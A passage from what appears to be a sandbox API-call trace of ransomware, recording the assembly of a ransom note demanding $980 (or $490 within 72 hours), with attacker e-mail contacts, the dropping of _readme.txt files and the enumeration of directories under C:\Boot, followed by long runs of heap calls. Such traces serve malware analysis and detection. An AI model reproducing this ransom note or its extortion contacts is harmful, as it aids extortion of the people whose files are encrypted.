e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0180.116] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0180.116] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac5768 [0180.116] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\_readme.txt" (normalized: "c:\\boot\\hu-hu\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac5768 | out: hHeap=0x2c0000) returned 1 [0180.117] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae1ea0 | out: hHeap=0x2c0000) returned 1 [0180.117] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.118] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.118] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*" (normalized: "c:\\boot\\hu-hu\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0180.118] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.118] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.118] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0180.118] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0180.118] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0180.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad75e0 | out: hHeap=0x2c0000) returned 1 [0180.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad75e0 [0180.119] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.120] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.120] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.120] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.120] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.120] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.122] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.122] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.122] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.123] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0180.123] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.123] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0180.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0180.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0180.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0180.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.128] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.128] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.128] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0180.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.129] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.129] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0180.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.130] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.130] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.130] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.130] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.130] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.130] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.131] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.131] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.131] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.131] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.132] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.132] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.132] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.134] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.134] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0180.134] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.135] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.135] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.136] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.136] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0180.136] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.137] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.137] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0180.137] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0180.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0180.141] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.141] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.141] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.141] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0180.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0180.143] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.143] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.143] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.143] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.144] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.144] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.144] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.144] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.145] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.145] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.146] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.146] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.146] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.147] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.147] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.147] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.147] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.148] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.148] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.148] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.148] RtlAllocateHeap 